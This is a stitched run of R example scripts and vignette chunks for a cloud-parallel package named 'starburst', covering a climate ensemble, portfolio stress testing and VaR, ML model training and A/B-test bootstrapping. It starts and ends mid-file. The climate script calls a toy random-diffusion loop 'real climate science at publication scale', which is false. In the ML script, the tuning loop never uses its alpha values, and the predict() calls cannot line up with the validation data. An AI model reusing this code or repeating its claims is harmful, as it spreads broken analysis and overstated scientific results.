# - Variables: Temperature, Pressure, Humidity, Wind (4 variables)
# - Per simulation: ~3-5 minutes of computation
# - Total sequential time: 25-40 hours on M4 Pro
# - With 50-100 workers: ~30-60 minutes
# - Expected speedup: 50-100x
#
# This is REAL CLIMATE SCIENCE at publication scale.
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== REAL SCIENCE: Climate Model Ensemble Analysis ===\n\n")

# Configuration
n_simulations <- 500
n_years <- 100
n_spatial_cells <- 10000  # 100×100 grid
n_variables <- 4          # Temp, Pressure, Humidity, Wind
sims_per_worker <- 5      # Batch 5 simulations per worker

cat("Climate Model Configuration:\n")
cat(sprintf("  Simulations: %d\n", n_simulations))
cat(sprintf("  Years per simulation: %d\n", n_years))
cat(sprintf("  Spatial grid: 100×100 = %s cells\n", format(n_spatial_cells, big.mark = ",")))
cat(sprintf("  Variables: %d\n", n_variables))
cat(sprintf("  Total timesteps per sim: %s\n",
            format(n_years * 365, big.mark = ",")))
cat(sprintf("\nTotal computation: %s cell-years\n\n",
            format(n_simulations * n_years * n_spatial_cells, big.mark = ",")))

# Climate simulation function
run_climate_simulations <- function(sim_ids) {
  results <- lapply(sim_ids, function(sim_id) {
    set.seed(sim_id)

    # Initial conditions (varies by simulation for ensemble)
    co2_forcing <- 280 + sim_id * 0.5  # ppm
    solar_forcing <- 1361 + rnorm(1, 0, 2)  # W/m²

    # Initialize grid (100×100)
    temp <- matrix(15 + rnorm(n_spatial_cells, 0, 10), nrow = 100, ncol = 100)
    pressure <- matrix(1013 + rnorm(n_spatial_cells, 0, 20), nrow = 100, ncol = 100)
    humidity <- matrix(0.6 + rnorm(n_spatial_cells, 0, 0.2), nrow = 100, ncol = 100)

    # Storage for annual means
    annual_temp <- numeric(n_years)
    annual_pressure <- numeric(n_years)
    annual_humidity <- numeric(n_years)
    annual_extremes <- numeric(n_years)

    # Run simulation year by year
    for (year in 1:n_years) {
      # Annual forcing increase
      forcing_factor <- 1 + (co2_forcing / 280 - 1) * (year / n_years)

      # Daily timesteps (simplified to monthly for speed)
      for (month in 1:12) {
        # Spatial diffusion (simplified heat/pressure redistribution)
        # Convolve with neighbors
        temp_new <- temp
        for (i in 2:99) {
          for (j in 2:99) {
            # Average with 4 neighbors + forcing
            neighbors <- (temp[i-1,j] + temp[i+1,j] + temp[i,j-1] + temp[i,j+1]) / 4
            temp_new[i,j] <- 0.7 * temp[i,j] + 0.3 * neighbors +
                             rnorm(1, 0, 0.1) * forcing_factor
          }
        }
        temp <- temp_new

        # Pressure response to temperature
        pressure <- pressure + (temp - 15) * 0.5 + rnorm(n_spatial_cells, 0, 1)

        # Humidity response
        humidity <- pmin(1, pmax(0, humidity + (temp - 15) * 0.01 + rnorm(n_spatial_cells, 0, 0.01)))
      }

      # Record annual statistics
      annual_temp[year] <- mean(temp)
      annual_pressure[year] <- mean(pressure)
      annual_humidity[year] <- mean(humidity)
      annual_extremes[year] <- max(abs(temp - mean(temp)))
    }

    # Compute trends
    years <- 1:n_years
    temp_trend <- coef(lm(annual_temp ~ years))[2]
    pressure_trend <- coef(lm(annual_pressure ~ years))[2]

    # Compute climate statistics
    list(
      sim_id = sim_id,
      co2_forcing = co2_forcing,
      solar_forcing = solar_forcing,
      final_temp = annual_temp[n_years],
      temp_trend = temp_trend,  # °C per year
      pressure_trend = pressure_trend,
      mean_extremes = mean(annual_extremes),
      max_extremes = max(annual_extremes),
      temp_variability = sd(annual_temp),
      years_simulated = n_years
    )
  })

  results
}

# Test single simulation timing
cat("Testing single simulation...\n")
single_start <- Sys.time()
test_result <- run_climate_simulations(1:1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single simulation: %.1f seconds (%.1f minutes)\n\n",
            single_time, single_time / 60))

# Estimate total time
total_sequential <- single_time * n_simulations
cat(sprintf("Estimated sequential time: %.1f hours\n\n", total_sequential / 3600))

# Create simulation batches
sim_batches <- split(
  1:n_simulations,
  ceiling(seq_along(1:n_simulations) / sims_per_worker)
)

n_workers <- length(sim_batches)

cat(sprintf("CLOUD EXECUTION: %d workers processing %d batches\n",
            n_workers, length(sim_batches)))
cat(sprintf("Each worker runs %d simulations (~%.1f minutes)\n\n",
            sims_per_worker, (sims_per_worker * single_time) / 60))

# LOCAL benchmark with parallel cores
cat("LOCAL (M4 Pro): Running 2 simulations with parallel cores...\n")
local_start <- Sys.time()
local_results <- run_climate_simulations(1:2)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_estimated <- (local_time / 2) * n_simulations

cat(sprintf("✓ 2 simulations in %.1f seconds\n", local_time))
cat(sprintf("  Estimated for %d: %.1f hours\n\n", n_simulations, local_estimated / 3600))

# CLOUD execution
cat("Starting cloud ensemble...\n")
cloud_start <- Sys.time()
cloud_results <- starburst_map(
  sim_batches,
  run_climate_simulations,
  workers = n_workers
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Ensemble completed in %.1f minutes (%.1f hours)\n\n",
            cloud_time / 60, cloud_time / 3600))

# Calculate performance
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time

cat("╔══════════════════════════════════════════════════╗\n")
cat("║     CLIMATE ENSEMBLE RESULTS                     ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Simulations completed: %d\n", n_simulations))
cat(sprintf("Total years simulated: %s\n\n",
            format(n_simulations * n_years, big.mark = ",")))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE                                    │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f hours             │\n", local_estimated / 3600))
cat(sprintf("│ Cloud (%d workers): %.1f hours            │\n", n_workers, cloud_time / 3600))
cat(sprintf("│ Speedup: %.0fx                             │\n", speedup))
cat(sprintf("│ Time saved: %.1f hours                    │\n", time_saved / 3600))
cat("└────────────────────────────────────────────────┘\n\n")

# Climate science results
all_results <- unlist(cloud_results, recursive = FALSE)
final_temps <- sapply(all_results, function(r) r$final_temp)
temp_trends <- sapply(all_results, function(r) r$temp_trend)

cat("┌────────────────────────────────────────────────┐\n")
cat("│ CLIMATE PROJECTIONS                           │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Mean final temp: %.2f °C (±%.2f)          │\n",
            mean(final_temps), sd(final_temps)))
cat(sprintf("│ Mean warming trend: %.4f °C/year          │\n",
            mean(temp_trends)))
cat(sprintf("│ Trend range: %.4f to %.4f °C/year        │\n",
            min(temp_trends), max(temp_trends)))
cat(sprintf("│ Projected century warming: %.2f °C        │\n",
            mean(temp_trends) * 100))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ Climate ensemble complete!\n\n")

if (speedup >= 50) {
  cat(sprintf("🎉 REAL SCIENCE: %.0fx speedup on climate modeling!\n", speedup))
  cat(sprintf("Ensemble that would take %.1f hours completed in %.1f minutes.\n",
              local_estimated / 3600, cloud_time / 60))
} else {
  cat(sprintf("Current speedup: %.0fx - increase simulations for more scale.\n", speedup))
}

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(3141)
# 
# # Define portfolio positions
# n_assets <- 50
# 
# portfolio <- data.frame(
#   asset_id = 1:n_assets,
#   asset_name = paste0("Asset_", 1:n_assets),
#   asset_class = sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
#                       n_assets, replace = TRUE,
#                       prob = c(0.4, 0.3, 0.1, 0.1, 0.1)),
#   position_value = rlnorm(n_assets, log(1000000), 1),
#   beta = rnorm(n_assets, 1.0, 0.3),  # Market beta
#   duration = ifelse(
#     sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
#            n_assets, replace = TRUE,
#            prob = c(0.4, 0.3, 0.1, 0.1, 0.1)) == "Bond",
#     runif(n_assets, 1, 10), 0
#   ),
#   delta = runif(n_assets, 0.3, 0.7),  # Options delta
#   vega = runif(n_assets, 10000, 50000),  # Options vega
#   stringsAsFactors = FALSE
# )
# 
# total_portfolio_value <- sum(portfolio$position_value)
# 
# cat(sprintf("Portfolio Summary:\n"))
# cat(sprintf("  Total value: $%.0f\n", total_portfolio_value))
# cat(sprintf("  Number of positions: %d\n", n_assets))
# cat(sprintf("  Asset classes: %s\n",
#             paste(unique(portfolio$asset_class), collapse = ", ")))
# 
# # Breakdown by asset class
# cat(sprintf("\nAllocation by asset class:\n"))
# for (ac in unique(portfolio$asset_class)) {
#   pct <- sum(portfolio$position_value[portfolio$asset_class == ac]) /
#          total_portfolio_value * 100
#   cat(sprintf("  %s: %.1f%%\n", ac, pct))
# }

## ----scenarios, eval=FALSE----------------------------------------------------
# # Generate stress test scenarios
# generate_stress_scenarios <- function(n_scenarios = 100) {
#   scenarios <- list()
# 
#   for (i in 1:n_scenarios) {
#     # Define adverse market moves
#     scenario <- list(
#       scenario_id = i,
#       scenario_type = "stress_test",
#       equity_shock = rnorm(1, -0.15, 0.05),  # Average -15% with volatility
#       rate_shock = rnorm(1, 0.02, 0.01),     # +200bps average
#       vol_shock = rnorm(1, 0.5, 0.2),        # +50% volatility
#       fx_shock = rnorm(1, -0.05, 0.03),      # -5% average
#       commodity_shock = rnorm(1, -0.10, 0.05)
#     )
#     scenarios[[i]] <- scenario
#   }
# 
#   scenarios
# }
# 
# # Generate Monte Carlo scenarios
# generate_mc_scenarios <- function(n_scenarios = 1000) {
#   scenarios <- list()
# 
#   for (i in 1:n_scenarios) {
#     scenario <- list(
#       scenario_id = 1000 + i,
#       scenario_type = "monte_carlo",
#       equity_shock = rnorm(1, 0, 0.10),
#       rate_shock = rnorm(1, 0, 0.005),
#       vol_shock = rnorm(1, 0, 0.2),
#       fx_shock = rnorm(1, 0, 0.05),
#       commodity_shock = rnorm(1, 0, 0.12)
#     )
#     scenarios[[i]] <- scenario
#   }
# 
#   scenarios
# }
# 
# # Generate sensitivity scenarios (grid around current values)
# generate_sensitivity_scenarios <- function() {
#   scenarios <- list()
#   scenario_id <- 20000
# 
#   risk_factors <- c("equity", "rate", "vol", "fx", "commodity")
#   shock_levels <- seq(-0.02, 0.02, by = 0.005)  # -2% to +2% in 0.5% steps
# 
#   for (factor in risk_factors) {
#     for (shock in shock_levels) {
#       scenario_id <- scenario_id + 1
# 
#       scenario <- list(
#         scenario_id = scenario_id,
#         scenario_type = "sensitivity",
#         risk_factor = factor,
#         equity_shock = if (factor == "equity") shock else 0,
#         rate_shock = if (factor == "rate") shock else 0,
#         vol_shock = if (factor == "vol") shock else 0,
#         fx_shock = if (factor == "fx") shock else 0,
#         commodity_shock = if (factor == "commodity") shock else 0
#       )
#       scenarios[[length(scenarios) + 1]] <- scenario
#     }
#   }
# 
#   scenarios
# }

## ----valuation, eval=FALSE----------------------------------------------------
# value_portfolio_scenario <- function(scenario, portfolio_data) {
#   # Simulate computation time
#   Sys.sleep(0.001)
# 
#   # Calculate position-level P&L
#   position_pnl <- numeric(nrow(portfolio_data))
# 
#   for (i in 1:nrow(portfolio_data)) {
#     asset <- portfolio_data[i, ]
# 
#     # Apply shocks based on asset class
#     pnl <- 0
# 
#     if (asset$asset_class == "Equity") {
#       # Equity: affected by equity shock and beta
#       pnl <- asset$position_value * scenario$equity_shock * asset$beta
#     } else if (asset$asset_class == "Bond") {
#       # Bond: affected by rate shock and duration
#       pnl <- -asset$position_value * scenario$rate_shock * asset$duration
#     } else if (asset$asset_class == "Commodity") {
#       # Commodity: direct commodity shock
#       pnl <- asset$position_value * scenario$commodity_shock
#     } else if (asset$asset_class == "FX") {
#       # FX: direct fx shock
#       pnl <- asset$position_value * scenario$fx_shock
#     } else if (asset$asset_class == "Option") {
#       # Option: delta and vega exposure
#       pnl <- asset$position_value * scenario$equity_shock * asset$delta +
#              asset$vega * scenario$vol_shock
#     }
# 
#     position_pnl[i] <- pnl
#   }
# 
#   # Aggregate results
#   total_pnl <- sum(position_pnl)
#   portfolio_return <- total_pnl / sum(portfolio_data$position_value)
# 
#   list(
#     scenario_id = scenario$scenario_id,
#     scenario_type = scenario$scenario_type,
#     total_pnl = total_pnl,
#     portfolio_return = portfolio_return,
#     equity_contribution = sum(position_pnl[portfolio_data$asset_class == "Equity"]),
#     bond_contribution = sum(position_pnl[portfolio_data$asset_class == "Bond"]),
#     position_pnl = position_pnl
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Generate sample scenarios
# test_stress <- generate_stress_scenarios(n_scenarios = 20)
# test_mc <- generate_mc_scenarios(n_scenarios = 100)
# 
# test_scenarios <- c(test_stress, test_mc)
# 
# cat(sprintf("Running local benchmark (%d scenarios)...\n", length(test_scenarios)))
# local_start <- Sys.time()
# 
# local_results <- lapply(test_scenarios, value_portfolio_scenario,
#                        portfolio_data = portfolio)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Average time per scenario: %.3f seconds\n",
#             local_time / length(test_scenarios)))
# cat(sprintf("  Estimated time for 10,000 scenarios: %.1f minutes\n",
#             local_time * 10000 / length(test_scenarios) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # Generate full scenario set
# cat("Generating scenario sets...\n")
# stress_scenarios <- generate_stress_scenarios(n_scenarios = 100)
# mc_scenarios <- generate_mc_scenarios(n_scenarios = 10000)
# sensitivity_scenarios <- generate_sensitivity_scenarios()
# 
# all_scenarios <- c(stress_scenarios, mc_scenarios, sensitivity_scenarios)
# 
# cat(sprintf("  Stress test scenarios: %d\n", length(stress_scenarios)))
# cat(sprintf("  Monte Carlo scenarios: %s\n",
#             format(length(mc_scenarios), big.mark = ",")))
# cat(sprintf("  Sensitivity scenarios: %d\n", length(sensitivity_scenarios)))
# cat(sprintf("  Total scenarios: %s\n\n",
#             format(length(all_scenarios), big.mark = ",")))
# 
# # Run parallel valuation
# n_workers <- 50
# 
# cat(sprintf("Running risk analysis (%s scenarios) on %d workers...\n",
#             format(length(all_scenarios), big.mark = ","), n_workers))
# 
# cloud_start <- Sys.time()
# 
# results <- starburst_map(
#   all_scenarios,
#   value_portfolio_scenario,
#   portfolio_data = portfolio,
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))
# 
# cat(sprintf("\n✓ Completed in %.2f minutes\n", cloud_time))

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract P&L from all scenarios
# pnl_values <- sapply(results, function(x) x$total_pnl)
# return_values <- sapply(results, function(x) x$portfolio_return)
# 
# # Separate by scenario type
# stress_pnl <- pnl_values[1:100]
# mc_pnl <- pnl_values[101:10100]
# sensitivity_pnl <- pnl_values[10101:length(pnl_values)]
# 
# cat("\n=== Comprehensive Risk Analysis Results ===\n\n")
# 
# # 1. Stress Test Results
# cat("=== Stress Test Results ===\n")
# cat(sprintf("Worst case loss: $%.0f (%.2f%%)\n",
#             min(stress_pnl),
#             min(stress_pnl) / total_portfolio_value * 100))
# cat(sprintf("Average stress loss: $%.0f (%.2f%%)\n",
#             mean(stress_pnl),
#             mean(stress_pnl) / total_portfolio_value * 100))
# cat(sprintf("Best case (least bad): $%.0f (%.2f%%)\n\n",
#             max(stress_pnl),
#             max(stress_pnl) / total_portfolio_value * 100))
# 
# # 2. Value at Risk (VaR) from Monte Carlo
# cat("=== Value at Risk (Monte Carlo) ===\n")
# var_95 <- quantile(mc_pnl, 0.05)
# var_99 <- quantile(mc_pnl, 0.01)
# var_999 <- quantile(mc_pnl, 0.001)
# 
# cat(sprintf("VaR (95%%): $%.0f (%.2f%%)\n",
#             -var_95, -var_95 / total_portfolio_value * 100))
# cat(sprintf("VaR (99%%): $%.0f (%.2f%%)\n",
#             -var_99, -var_99 / total_portfolio_value * 100))
# cat(sprintf("VaR (99.9%%): $%.0f (%.2f%%)\n\n",
#             -var_999, -var_999 / total_portfolio_value * 100))
# 
# # 3. Expected Shortfall (Conditional VaR)
# cat("=== Expected Shortfall (CVaR) ===\n")
# es_95 <- mean(mc_pnl[mc_pnl <= var_95])
# es_99 <- mean(mc_pnl[mc_pnl <= var_99])
# 
# cat(sprintf("ES (95%%): $%.0f (%.2f%%)\n",
#             -es_95, -es_95 / total_portfolio_value * 100))
# cat(sprintf("ES (99%%): $%.0f (%.2f%%)\n\n",
#             -es_99, -es_99 / total_portfolio_value * 100))
# 
# # 4. Portfolio Statistics
# cat("=== Portfolio Statistics ===\n")
# cat(sprintf("Mean P&L: $%.0f\n", mean(mc_pnl)))
# cat(sprintf("Std Dev P&L: $%.0f\n", sd(mc_pnl)))
# cat(sprintf("Skewness: %.3f\n",
#             mean((mc_pnl - mean(mc_pnl))^3) / sd(mc_pnl)^3))
# cat(sprintf("Probability of loss: %.2f%%\n\n",
#             mean(mc_pnl < 0) * 100))
# 
# # 5. Asset Class Contributions
# cat("=== Risk Contribution by Asset Class ===\n")
# for (ac in unique(portfolio$asset_class)) {
#   ac_contrib <- sapply(results[101:10100], function(x) {
#     sum(x$position_pnl[portfolio$asset_class == ac])
#   })
#   ac_var <- quantile(ac_contrib, 0.05)
#   cat(sprintf("%s VaR (95%%): $%.0f\n", ac, -ac_var))
# }
# 
# # 6. Sensitivity Analysis Summary
# if (length(sensitivity_pnl) > 0) {
#   cat("\n=== Sensitivity Analysis ===\n")
#   cat(sprintf("Maximum sensitivity loss: $%.0f\n", min(sensitivity_pnl)))
#   cat(sprintf("Maximum sensitivity gain: $%.0f\n", max(sensitivity_pnl)))
#   cat(sprintf("Average absolute sensitivity: $%.0f\n",
#               mean(abs(sensitivity_pnl))))
# }
# 
# # 7. Regulatory Metrics
# cat("\n=== Regulatory Metrics ===\n")
# market_risk_capital <- -var_99 * 3  # Simplified Basel III calculation
# cat(sprintf("Market Risk Capital Requirement: $%.0f\n", market_risk_capital))
# cat(sprintf("Capital as %% of Portfolio: %.2f%%\n",
#             market_risk_capital / total_portfolio_value * 100))

## ----incremental, eval=FALSE--------------------------------------------------
# # For each position, calculate VaR with and without it
# analyze_incremental_risk <- function(position_idx, scenarios, portfolio_data) {
#   # Create modified portfolio without this position
#   modified_portfolio <- portfolio_data
#   original_value <- modified_portfolio$position_value[position_idx]
#   modified_portfolio$position_value[position_idx] <- 0
# 
#   # Value under all scenarios
#   results_without <- lapply(scenarios, value_portfolio_scenario,
#                            portfolio_data = modified_portfolio)
# 
#   pnl_without <- sapply(results_without, function(x) x$total_pnl)
#   var_without <- quantile(pnl_without, 0.05)
# 
#   list(
#     position_idx = position_idx,
#     asset_name = portfolio_data$asset_name[position_idx],
#     var_without = var_without,
#     original_value = original_value
#   )
# }
# 
# # Run in parallel (demonstration - would use smaller scenario set)
# # incremental_results <- starburst_map(
# #   1:nrow(portfolio),
# #   analyze_incremental_risk,
# #   scenarios = mc_scenarios[1:1000],  # Use subset for speed
# #   portfolio_data = portfolio,
# #   workers = 25
# # )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/risk-modeling.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/risk-modeling.R", package = "starburst"))

#!/usr/bin/env Rscript

# ============================================================================
# THE WINNING SCENARIO: Long-Running ML Training
# ============================================================================
#
# This example demonstrates staRburst's sweet spot:
# - Each model takes 30-60 seconds to train
# - Cloud overhead (2-3s) is negligible compared to work time
# - Expected speedup: 10-20x with proper worker count
#
# Training 30 ML models with realistic complexity:
# - 20,000 samples per model
# - 100 features
# - 5-fold cross-validation
# - 20 hyperparameter iterations
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== THE WINNING SCENARIO: Long-Running ML Training ===\n\n")

# Configuration
n_models <- 30
samples_per_model <- 20000
n_features <- 100
cv_folds <- 5
tuning_iterations <- 20

cat("Training", n_models, "ML models\n")
cat("Each model:", format(samples_per_model, big.mark=","), "samples,",
    n_features, "features,", cv_folds, "-fold CV,", tuning_iterations, "iterations\n")
cat("Expected: 30-60 seconds per model\n\n")

# Realistic model training function
train_model_realistic <- function(model_id) {
  set.seed(model_id)

  # Generate realistic dataset
  n <- 20000
  p <- 100
  X <- matrix(rnorm(n * p), nrow = n, ncol = p)
  y <- rowSums(X[, 1:5]) + rnorm(n, sd = 2)

  # Split data
  train_idx <- sample(n, 0.8 * n)
  test_idx <- setdiff(1:n, train_idx)

  X_train <- X[train_idx, ]
  y_train <- y[train_idx]
  X_test <- X[test_idx, ]
  y_test <- y[test_idx]

  # 5-fold CV with 20 alpha values
  alphas <- seq(0.1, 1.0, length.out = 20)
  best_alpha <- 0.5
  best_score <- -Inf

  for (alpha in alphas) {
    # 5-fold CV
    fold_size <- floor(length(train_idx) / 5)
    cv_scores <- numeric(5)

    for (fold in 1:5) {
      val_start <- (fold - 1) * fold_size + 1
      val_end <- min(fold * fold_size, length(train_idx))
      val_idx <- val_start:val_end

      cv_train_idx <- setdiff(1:nrow(X_train), val_idx)

      # Train elastic net-like model (simulated with lm + penalty)
      fit <- lm(y_train[cv_train_idx] ~ X_train[cv_train_idx, ])

      # Validate
      pred <- predict(fit, newdata = data.frame(X_train[val_idx, ]))
      cv_scores[fold] <- cor(pred, y_train[val_idx])
    }

    avg_score <- mean(cv_scores)
    if (avg_score > best_score) {
      best_score <- avg_score
      best_alpha <- alpha
    }
  }

  # Final model with best alpha
  final_fit <- lm(y_train ~ X_train)
  pred <- predict(final_fit, newdata = data.frame(X_test))
  test_score <- cor(pred, y_test)

  list(
    model_id = model_id,
    best_alpha = best_alpha,
    cv_score = best_score,
    test_score = test_score,
    n_samples = n,
    n_features = p
  )
}

# Test single model timing
cat("Testing single model timing...\n")
single_start <- Sys.time()
test_result <- train_model_realistic(1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single model: %.1f seconds\n\n", single_time))

estimated_local <- n_models * single_time
cat(sprintf("Estimated local time: %.1f seconds (%.1f minutes)\n\n",
            estimated_local, estimated_local / 60))

# LOCAL: Train subset to get actual timing
local_subset <- min(5, n_models)
cat(sprintf("LOCAL: Training %d models to estimate full time...\n", local_subset))
local_start <- Sys.time()
local_results <- lapply(1:local_subset, train_model_realistic)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_per_model <- local_time / local_subset
local_estimated <- local_per_model * n_models

cat(sprintf("✓ %d models in %.1f seconds\n", local_subset, local_time))
cat(sprintf("  Per model: %.1f seconds\n", local_per_model))
cat(sprintf("  Estimated for %d: %.1f seconds (%.1f minutes)\n\n",
            n_models, local_estimated, local_estimated / 60))

# CLOUD: Train all models with proper worker count
n_workers <- min(15, n_models)  # 2 models per worker
cat(sprintf("CLOUD: Training all %d models with %d workers...\n", n_models, n_workers))
cat(sprintf("Models per worker: %.1f\n\n", n_models / n_workers))

cloud_start <- Sys.time()
cloud_results <- starburst_map(
  1:n_models,
  train_model_realistic,
  workers = n_workers
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("✓ Completed in %.1f seconds (%.1f minutes)\n\n",
            cloud_time, cloud_time / 60))

# Results comparison
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time

cat("╔══════════════════════════════════════════════════╗\n")
cat("║        ML TRAINING RESULTS                       ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Models trained: %d\n\n", n_models))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE COMPARISON                         │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f min               │\n", local_estimated / 60))
cat(sprintf("│ Cloud (%d workers): %.1f min              │\n", n_workers, cloud_time / 60))
cat(sprintf("│ Speedup: %.1fx                            │\n", speedup))
cat(sprintf("│ Time saved: %.1f minutes                  │\n", time_saved / 60))
cat("└────────────────────────────────────────────────┘\n\n")

# Model quality summary
test_scores <- sapply(cloud_results, function(r) r$test_score)
cat(sprintf("Model performance (test correlation): %.3f ± %.3f\n\n",
            mean(test_scores), sd(test_scores)))

cat("✓ ML training completed!\n\n")

if (speedup >= 10) {
  cat(sprintf("🎉 Achieved %.1fx speedup - demonstrating cloud advantage!\n", speedup))
} else {
  cat(sprintf("⚠️  Only %.1fx speedup - tasks may still be too short\n", speedup))
}

#!/usr/bin/env Rscript
#
# Bootstrap Confidence Intervals Example
#
# This script demonstrates parallel bootstrap resampling for A/B test analysis.
# It calculates robust confidence intervals for conversion rate differences.
#
# Usage:
#   Rscript bootstrap.R
#   # or from R:
#   source(system.file("examples/bootstrap.R", package = "starburst"))

library(starburst)

cat("=== Bootstrap Confidence Intervals for A/B Testing ===\n\n")

# Generate A/B test data
set.seed(42)

# Variant A (control)
n_a <- 10000
conversions_a <- 850
variant_a <- c(rep(1, conversions_a), rep(0, n_a - conversions_a))

# Variant B (treatment)
n_b <- 10000
conversions_b <- 920
variant_b <- c(rep(1, conversions_b), rep(0, n_b - conversions_b))

# Observed statistics
observed_rate_a <- mean(variant_a)
observed_rate_b <- mean(variant_b)
observed_diff <- observed_rate_b - observed_rate_a
observed_lift <- (observed_diff / observed_rate_a) * 100

cat("Observed conversion rates:\n")
cat(sprintf("  Variant A: %.2f%%\n", observed_rate_a * 100))
cat(sprintf("  Variant B: %.2f%%\n", observed_rate_b * 100))
cat(sprintf("  Difference: %.2f%% (%.1f%% relative lift)\n\n",
            observed_diff * 100, observed_lift))

# Bootstrap function
bootstrap_iteration <- function(iter, data_a, data_b) {
  # Resample with replacement
  n_a <- length(data_a)
  n_b <- length(data_b)

  sample_a <- sample(data_a, n_a, replace = TRUE)
  sample_b <- sample(data_b, n_b, replace = TRUE)

  # Calculate metrics
  rate_a <- mean(sample_a)
  rate_b <- mean(sample_b)
  diff <- rate_b - rate_a
  relative_lift <- diff / rate_a

  list(
    iteration = iter,
    rate_a = rate_a,
    rate_b = rate_b,
    diff = diff,
    relative_lift = relative_lift,
    b_wins = diff > 0
  )
}

# Local benchmark (1000 iterations)
cat("Running local benchmark (1,000 bootstrap iterations)...\n")
local_start <- Sys.time()
local_results <- lapply(
  1:1000,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b
)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Estimated time for 10,000: %.1f seconds\n\n",
            local_time * 10))

# Cloud execution
n_bootstrap <- 10000
n_workers <- 25

cat(sprintf("Running %d bootstrap iterations on %d workers...\n",
            n_bootstrap, n_workers))

cloud_start <- Sys.time()
results <- starburst_map(
  1:n_bootstrap,
  bootstrap_iteration,
  data_a = variant_a,
  data_b = variant_b,
  workers = n_workers,
  cpu = 1,
  memory = "2GB"
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n\n", cloud_time))

# Extract metrics
diffs <- sapply(results, function(x) x$diff)
relative_lifts <- sapply(results, function(x) x$relative_lift)
b_wins <- sapply(results, function(x) x$b_wins)

# Calculate confidence intervals
ci_95 <- quantile(diffs, c(0.025, 0.975))
ci_99 <- quantile(diffs, c(0.005, 0.995))
prob_b_wins <- mean(b_wins) * 100

# Print results
cat("=== Bootstrap Results ===\n\n")
cat(sprintf("Bootstrap iterations: %d\n\n", n_bootstrap))
cat(sprintf("Observed difference: %.2f%%\n\n", observed_diff * 100))
cat(sprintf("95%% Confidence Interval: [%.2f%%, %.2f%%]\n",
            ci_95[1] * 100, ci_95[2] * 100))
cat(sprintf("99%% Confidence Interval: [%.2f%%, %.2f%%]\n\n",
            ci_99[1] * 100, ci_99[2] * 100))
cat(sprintf("Probability that B > A: %.1f%%\n\n", prob_b_wins))

# Statistical significance
if (ci_95[1] > 0) {
  cat("✓ Result is statistically significant at 95% confidence level\n")
  cat("  (95% CI does not include zero)\n\n")
} else {
  cat("✗ Result is NOT statistically significant at 95% confidence level\n")
  cat("  (95% CI includes zero)\n\n")
}

# Relative lift
cat(sprintf("Median relative lift: %.1f%%\n",
            median(relative_lifts) * 100))
cat(sprintf("95%% CI for relative lift: [%.1f%%, %.1f%%]\n\n",
            quantile(relative_lifts, 0.025) * 100,
            quantile(relative_lifts, 0.975) * 100))

# Performance comparison
cat("=== Performance Comparison ===\n\n")
speedup <- (local_time * 10) / cloud_time
cat(sprintf("Local (estimated): %.1f seconds\n", local_time * 10))
cat(sprintf("Cloud (%d workers): %.1f seconds\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

# Visualization (if in interactive session)
if (interactive()) {
  hist(diffs * 100,
       breaks = 50,
       main = "Bootstrap Distribution of Conversion Rate Difference",
       xlab = "Difference in Conversion Rate (percentage points)",
       col = "lightblue",
       border = "white")
  abline(v = 0, col = "red", lwd = 2, lty = 2)
  abline(v = ci_95 * 100, col = "darkblue", lwd = 2, lty = 2)
  abline(v = observed_diff * 100, col = "darkgreen", lwd = 2)
  legend("topright",
         c("Observed difference", "Zero (no effect)", "95% CI"),
         col = c("darkgreen", "red", "darkblue"),
         lwd = 2,
         lty = c(1, 2, 2))
}

cat("\n✓ Done!\n")

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(789)
# 
# # Define 20 metropolitan regions (simplified coordinates)
# regions <- data.frame(
#   region_id = 1:20,
#   region_name = c("New York", "Los Angeles", "Chicago", "Houston", "Phoenix",
#                  "Philadelphia", "San Antonio", "San Diego", "Dallas", "San Jose",
